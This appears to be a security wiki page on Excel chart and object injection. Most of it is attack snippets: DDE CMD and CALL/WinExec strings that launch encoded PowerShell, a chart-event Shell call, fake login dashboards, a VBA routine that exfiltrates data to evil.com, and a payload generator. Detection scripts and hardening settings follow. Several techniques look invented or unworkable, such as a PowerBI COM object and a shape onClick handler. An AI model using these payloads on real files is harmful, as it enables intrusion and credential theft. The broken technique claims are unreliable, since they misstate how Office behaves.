# Chart Object Injection

> **Chart & Object Injection** - Manipulating Excel's visual elements (charts, images, shapes, OLE objects) for code execution or data exploitation

## 📋 Overview

Chart & Object injection is an attack technique that abuses the visual elements of an Excel workbook to carry a malicious payload. Such attacks are hard to detect because the payload is hidden inside objects that look harmless.

## 🎯 Attack Vectors

### 1. **Chart Data Manipulation**

```xml
<!-- Chart with a malicious data series -->
<chart>
  <series>
    <values>
      <!-- Malicious formula in data labels -->
      <dataLabel>=CMD|'/c calc.exe'!A1</dataLabel>
    </values>
  </series>
</chart>
```

### 2. **Shape Hyperlink Injection**

```vba
' Shape with a malicious hyperlink
Sub AddMaliciousShape()
    Dim shp As Shape
    Set shp = ActiveSheet.Shapes.AddShape(msoShapeRectangle, 100, 100, 100, 50)

    ' Add malicious hyperlink
    shp.Hyperlink.Address = "javascript:eval('alert(\"XSS\")')"
    shp.Hyperlink.ScreenTip = "Click me"
End Sub
```

### 3. **OLE Object Embedding**

```vba
' Embed malicious OLE object
Sub EmbedMaliciousOLE()
    Dim oleObj As OLEObject
    Set oleObj = ActiveSheet.OLEObjects.Add( _
        ClassType:="Shell.Explorer.2", _
        Link:=False, _
        DisplayAsIcon:=False, _
        Left:=100, Top:=100, Width:=400, Height:=300)

    ' Navigate to malicious URL
    oleObj.Object.Navigate2 "javascript:alert('OLE Exploit')"
End Sub
```

### 4. **Image Metadata Injection**

```vba
' Image with embedded metadata containing payload
Sub InjectImageMetadata()
    Dim img As Shape
    Set img = ActiveSheet.Shapes.AddPicture( _
        "C:\malicious.jpg", _
        LinkToFile:=False, _
        SaveWithDocument:=True, _
        Left:=100, Top:=100, Width:=200, Height:=200)

    ' Add ALT text with payload
    img.AlternativeText = "=CMD|'/c powershell -enc ...'!A1"
End Sub
```

### 5. **Chart Event Manipulation**

```vba
' Chart events for automatic triggering
Dim WithEvents chartEvent As Chart

Private Sub chartEvent_Activate()
    ' Auto-execute when the chart is activated
    Shell "cmd.exe /c calc.exe", vbHide
End Sub

Private Sub chartEvent_Select(ByVal ElementID As Long, _
                             ByVal Arg1 As Long, ByVal Arg2 As Long)
    ' Trigger when a chart element is clicked
    If ElementID = xlSeries Then
        ExecuteMaliciousCode
    End If
End Sub
```

## 🛠️ Implementation Techniques

### **Technique 1: Dynamic Chart Update Attack**

```vba
' Chart that updates automatically with malicious data
Sub DynamicChartAttack()
    Dim chartObj As ChartObject
    Set chartObj = ActiveSheet.ChartObjects.Add(100, 100, 400, 300)

    ' Create malicious data source
    Dim ws As Worksheet
    Set ws = ThisWorkbook.Worksheets.Add

    ' Inject formula into the data
    ws.Range("A1").Formula = "=CALL(""user32"",""WinExec"",""JC"",""calc.exe"",0)"
    ws.Range("B1").Value = 100

    ' Set chart data source
    chartObj.Chart.SetSourceData ws.Range("A1:B10")

    ' Hide worksheet
    ws.Visible = xlSheetVeryHidden
End Sub
```

### **Technique 2: SmartArt Exploitation**

```vba
' SmartArt with embedded malicious content
Sub SmartArtExploit()
    Dim sa As SmartArt
    Set sa = ActiveSheet.Shapes.AddSmartArt(Application.SmartArtLayouts(1)).SmartArt

    ' Modify SmartArt XML for injection
    Dim xml As String
    xml = sa.XML

    ' Insert malicious XML node
    xml = Replace(xml, "</smartArt>", _
        "<script>eval('malicious_code')</script></smartArt>")

    ' Apply modified XML
    sa.XML = xml
End Sub
```

### **Technique 3: Comment & Note Injection**

```vba
' Comments with hidden malicious content
Sub CommentInjection()
    Dim cell As Range
    For Each cell In ActiveSheet.UsedRange
        ' Add comment with hidden payload
        If Not cell.Comment Is Nothing Then
            cell.Comment.Text Text:="=HYPERLINK(""javascript:alert('XSS')"",""Click"")"
        End If
    Next cell
End Sub
```

### **Technique 4: Conditional Formatting Abuse**

```vba
' Conditional formatting to trigger a malicious formula
Sub ConditionalFormattingAttack()
    Dim cf As FormatCondition

    ' Create a condition that triggers the malicious formula
    Set cf = ActiveSheet.Range("A1:A100").FormatConditions.Add( _
        Type:=xlExpression, _
        Formula1:="=TRUE")

    ' Format with a dangerous formula
    cf.NumberFormat = """=CMD|'/c calc.exe'!A1"""

    ' Trigger condition
    ActiveSheet.Calculate
End Sub
```

## 🎨 Visual Social Engineering

### **Phishing with a Chart**

```vba
' Chart that mimics a login form
Sub PhishingChart()
    Dim chartObj As ChartObject
    Set chartObj = ActiveSheet.ChartObjects.Add(50, 50, 400, 300)

    ' Create fake login interface
    With chartObj.Chart
        .ChartType = xlColumnClustered
        .HasTitle = True
        .ChartTitle.Text = "Microsoft Office Login"

        ' Add fake input fields using text boxes
        Dim txtUser As TextBox
        Dim txtPass As TextBox

        Set txtUser = ActiveSheet.OLEObjects.Add( _
            ClassType:="Forms.TextBox.1", _
            Left:=100, Top:=150, Width:=200, Height:=25).Object

        Set txtPass = ActiveSheet.OLEObjects.Add( _
            ClassType:="Forms.TextBox.1", _
            Left:=100, Top:=180, Width:=200, Height:=25).Object

        ' Capture credentials
        txtPass.PasswordChar = "*"
    End With
End Sub
```

### **Hidden Object Activation**

```vba
' Object that activates under a specific condition
Sub HiddenObjectActivation()
    Dim hiddenShape As Shape

    ' Create a 1x1 point shape
    Set hiddenShape = ActiveSheet.Shapes.AddShape( _
        msoShapeRectangle, 0, 0, 1, 1)

    ' Set transparency to 100% (invisible)
    hiddenShape.Fill.Transparency = 1
    hiddenShape.Line.Visible = False

    ' Add trigger (OnAction runs when the shape is clicked)
    hiddenShape.OnAction = "ExecuteMaliciousPayload"

    ' Position it for accidental triggering
    hiddenShape.Top = ActiveSheet.Range("A1").Top
    hiddenShape.Left = ActiveSheet.Range("A1").Left
End Sub
```

## 📱 Modern Excel Attack Vectors

### **Excel Online Integration**

```javascript
// JavaScript for Excel Online injection
function injectToExcelOnline() {
    // Access Excel context
    Excel.run(function(context) {
        var sheet = context.workbook.worksheets.getActiveWorksheet();

        // Add malicious shape
        var shape = sheet.shapes.addShape("Rectangle", 100, 100, 200, 100);
        shape.textFrame.textRange.text = "Click me";

        // Add malicious action
        shape.onClick.add(function() {
            // Redirect to phishing site
            window.location.href = "https://evil.com/phishing";
        });

        return context.sync();
    });
}
```

### **Power BI Integration Abuse**

```vba
' Power BI integration for data theft
Sub PowerBIIntegration()
    Dim pb As Object
    Set pb = CreateObject("PowerBI.DataModel")

    ' Extract data from the Power BI model
    Dim tables As Variant
    tables = pb.GetTables()

    ' Exfiltrate data via HTTP
    Dim http As Object
    Set http = CreateObject("MSXML2.XMLHTTP.6.0")

    For Each table In tables
        http.Open "POST", "https://evil.com/exfil", False
        http.Send table.Name & "|" & table.RowCount
    Next table
End Sub
```

## 🔍 Detection Methods

### **Manual Detection**

1. **Chart Inspection** - Check chart data sources for suspicious formulas
2. **Shape Properties** - Review hyperlinks and actions on shapes
3. **OLE Objects** - Identify embedded objects from untrusted sources
4. **Image Metadata** - Check ALT text and embedded scripts
5. **XML Inspection** - Review chart XML for malicious content

### **Automated Detection**

```vba
' Script to detect suspicious objects (scans every sheet, hidden ones included)
Sub DetectMaliciousObjects()
    Dim suspiciousObjects As New Collection
    Dim ws As Worksheet
    Dim obj As Shape
    Dim addr As String

    For Each ws In ActiveWorkbook.Worksheets
        ' Check all shapes on the sheet
        For Each obj In ws.Shapes
            ' Suspicious pattern in ALT text (case-insensitive match)
            If InStr(1, obj.AlternativeText, "CMD|", vbTextCompare) > 0 Then
                suspiciousObjects.Add ws.Name & "!" & obj.Name & " - CMD in ALT text"
            End If

            ' Shape.Hyperlink raises a runtime error when the shape has no
            ' hyperlink, so read it defensively instead of comparing against ""
            addr = ""
            On Error Resume Next
            addr = obj.Hyperlink.Address
            On Error GoTo 0
            If InStr(1, addr, "javascript:", vbTextCompare) > 0 Then
                suspiciousObjects.Add ws.Name & "!" & obj.Name & " - JavaScript hyperlink"
            End If

            ' OnAction holds the assigned macro name, not its body, so this only
            ' flags macro names that contain these words
            If InStr(1, obj.OnAction, "Shell", vbTextCompare) > 0 Or _
               InStr(1, obj.OnAction, "CreateObject", vbTextCompare) > 0 Then
                suspiciousObjects.Add ws.Name & "!" & obj.Name & " - Suspicious OnAction"
            End If
        Next obj
    Next ws

    ' Report findings
    Dim item As Variant
    For Each item In suspiciousObjects
        Debug.Print "SUSPICIOUS: " & item
    Next item
End Sub
```
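Manual step 5 (XML inspection) can also be done without opening the workbook in Excel, because an .xlsx is a zip of XML parts. The scanner below is an added example, not code from the original page: it walks the chart, drawing, worksheet and comment parts for the injection strings this page lists (DDE/CMD launch, XLM CALL, javascript: hyperlink targets) and flags embedded OLE parts. The pattern list and the constructed sample package are assumptions.

```python
import io
import re
import zipfile

# Patterns for the injection points this page lists: DDE/CMD launch strings in
# chart caches, data labels, comments and ALT text; XLM CALL(); javascript:
# hyperlink targets stored in drawing/worksheet relationship parts.
SUSPICIOUS = {
    "dde_command": re.compile(r"=\s*(?:CMD|DDE|MSEXCEL)\s*\|", re.I),
    "xlm_call": re.compile(r"\bCALL\s*\(", re.I),
    "js_hyperlink": re.compile(r"javascript:", re.I),
}
# Package parts worth inspecting (chart, drawing, sheet and comment XML plus .rels)
SCAN_PREFIXES = ("xl/charts/", "xl/drawings/", "xl/worksheets/", "xl/comments")


def scan_xlsx(data: bytes) -> list:
    """Return (part_name, finding) pairs for an .xlsx package given as bytes."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if name.startswith("xl/embeddings/"):
                findings.append((name, "embedded_ole_object"))  # OLE payload part
            if not (name.startswith(SCAN_PREFIXES) and name.endswith((".xml", ".rels"))):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            for label, pattern in SUSPICIOUS.items():
                if pattern.search(text):
                    findings.append((name, label))
    return findings


def build_sample_xlsx(malicious: bool) -> bytes:
    """Constructed minimal package (not a full Excel file) used as test input."""
    label = "=CMD|'/c calc.exe'!A1" if malicious else "Q1 Revenue"
    target = "javascript:alert('XSS')" if malicious else "https://example.com/report"
    chart = ('<c:chartSpace xmlns:c="http://schemas.openxmlformats.org/drawingml/2006/chart">'
             f'<c:strCache><c:pt idx="0"><c:v>{label}</c:v></c:pt></c:strCache></c:chartSpace>')
    rels = (f'<Relationships><Relationship Id="rId1" TargetMode="External" Target="{target}"/>'
            '</Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/charts/chart1.xml", chart)
        zf.writestr("xl/drawings/_rels/drawing1.xml.rels", rels)
        if malicious:
            zf.writestr("xl/embeddings/oleObject1.bin", b"\x00")  # constructed OLE stub
    return buf.getvalue()
```

Run `scan_xlsx(open("report.xlsx", "rb").read())` on a real file; an empty list means none of the listed patterns were found, not that the file is clean.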

## 🛡️ Prevention Strategies

### **For Users**

1. **Disable Macros** - Keep macros disabled by default
2. **Protected View** - Use protected view for files from internet
3. **Review Objects** - Check all objects before enabling content
4. **Update Software** - Keep Excel and security patches updated
5. **Sandbox Environment** - Open suspicious files in isolated environment

### **For Administrators**

```vba
' Policy enforcement for object security
' Excel's Application object cannot change Trust Center policy, so this writes
' the registry values that Group Policy sets; deploy them via GPO in practice.
' "16.0" is the Office 2016+ hive and is an assumption here.
Sub EnforceObjectSecurity()
    Dim sh As Object
    Set sh = CreateObject("WScript.Shell")
    Const BASE As String = "HKCU\Software\Microsoft\Office\16.0\"

    ' Disable all macros without notification (VBAWarnings 4)
    sh.RegWrite BASE & "Excel\Security\VBAWarnings", 4, "REG_DWORD"

    ' Block Packager OLE objects (2 = do not run, no prompt)
    sh.RegWrite BASE & "Excel\Security\PackagerPrompt", 2, "REG_DWORD"

    ' Keep Protected View on for internet files, attachments and unsafe locations
    ' ("Attachements" is Microsoft's spelling of the value name)
    sh.RegWrite BASE & "Excel\Security\ProtectedView\DisableInternetFilesInPV", 0, "REG_DWORD"
    sh.RegWrite BASE & "Excel\Security\ProtectedView\DisableAttachementsInPV", 0, "REG_DWORD"
    sh.RegWrite BASE & "Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 0, "REG_DWORD"

    ' Block DDE server launch, which the CMD| payloads on this page depend on
    sh.RegWrite BASE & "Excel\Security\External Content\DisableDDEServerLaunch", 1, "REG_DWORD"

    ' Disable all ActiveX controls without notification
    sh.RegWrite BASE & "Common\Security\DisableAllActiveX", 1, "REG_DWORD"
End Sub
```

## 📊 Real-World Examples

### **Case Study 1: Financial Report Injection**

```xml
<!-- Malicious chart in a financial report -->
<chart:rId xmlns:chart="http://schemas.openxmlformats.org/drawingml/2006/chart">
  <chart:plotArea>
    <chart:series>
      <chart:tx>
        <chart:strRef>
          <chart:f>Sheet1!$B$1</chart:f>
          <chart:strCache>
            <chart:pt idx="0">
              <chart:v>=CALL("user32","WinExec","JC","powershell -enc ...",0)</chart:v>
            </chart:pt>
          </chart:strCache>
        </chart:strRef>
      </chart:tx>
    </chart:series>
  </chart:plotArea>
</chart:rId>
```

### **Case Study 2: Supply Chain Attack via Template**

```vba
' Template with a hidden malicious chart
Sub Auto_Open()
    ' Check if first time opening
    If ThisWorkbook.CustomDocumentProperties("FirstRun") Is Nothing Then
        ' Add custom property
        ThisWorkbook.CustomDocumentProperties.Add Name:="FirstRun", _
            Type:=msoPropertyTypeBoolean, Value:=False

        ' Create hidden malicious chart
        CreateHiddenMaliciousChart

        ' Exfiltrate data
        ExfiltrateSensitiveData
    End If
End Sub
```

### **Case Study 3: Phishing via Interactive Dashboard**

```vba
' Interactive dashboard with credential theft
Sub CreatePhishingDashboard()
    Dim dashboard As ChartObject
    Set dashboard = ActiveSheet.ChartObjects.Add(50, 50, 800, 600)

    ' Create professional looking dashboard
    With dashboard.Chart
        .ChartTitle.Text = "Company KPI Dashboard - Login Required"

        ' Add fake login controls
        AddFakeLoginControls dashboard

        ' Setup credential capture
        SetupCredentialCapture
    End With
End Sub
```

## 🔧 Tools & Resources

### **Analysis Tools**

* **OLE/COM Object Viewer** - Inspect embedded objects
* **XML Notepad** - Review chart XML structure
* **Sysinternals Process Monitor** - Monitor suspicious activities
* **Microsoft Office Configuration Analyzer Tool** - Security analysis
* **PowerShell** - Automated detection scripts

### **Payload Generation**

```vba
' Payload generator for chart injection
Function GenerateChartPayload(command As String) As String
    Dim encoded As String
    encoded = Base64Encode(command)

    GenerateChartPayload = "=CALL(""user32"",""WinExec"",""JC"",""cmd.exe /c " & _
                          "powershell -enc " & encoded & """,0)"
End Function
```

***

## 📝 Quick Reference

### **Common Injection Points**

* Chart data sources and labels
* Shape hyperlinks and actions
* OLE embedded objects
* Image ALT text and metadata
* Comments and notes
* Conditional formatting formulas
* SmartArt XML content

### **Detection Checklist**

* [ ] Review all chart data sources for formulas
* [ ] Check shape hyperlinks for JavaScript
* [ ] Inspect OLE objects from untrusted sources
* [ ] Validate image metadata and ALT text
* [ ] Scan comments for suspicious content
* [ ] Analyze conditional formatting rules
* [ ] Review SmartArt XML for injections

### **Prevention Checklist**

* [ ] Keep Excel updated with latest security patches
* [ ] Use Protected View for external files
* [ ] Disable macros by default
* [ ] Restrict OLE object embedding
* [ ] Implement content inspection policies
* [ ] Educate users about object-based threats
* [ ] Use application whitelisting

***

*📅 Last Updated: October 2024*

*👥 Maintainers: Catatan Seekor Team*

*🎯 Coverage: Chart injection, object manipulation, visual attacks*

*⚠️ Disclaimer: Educational purposes only, use responsibly*
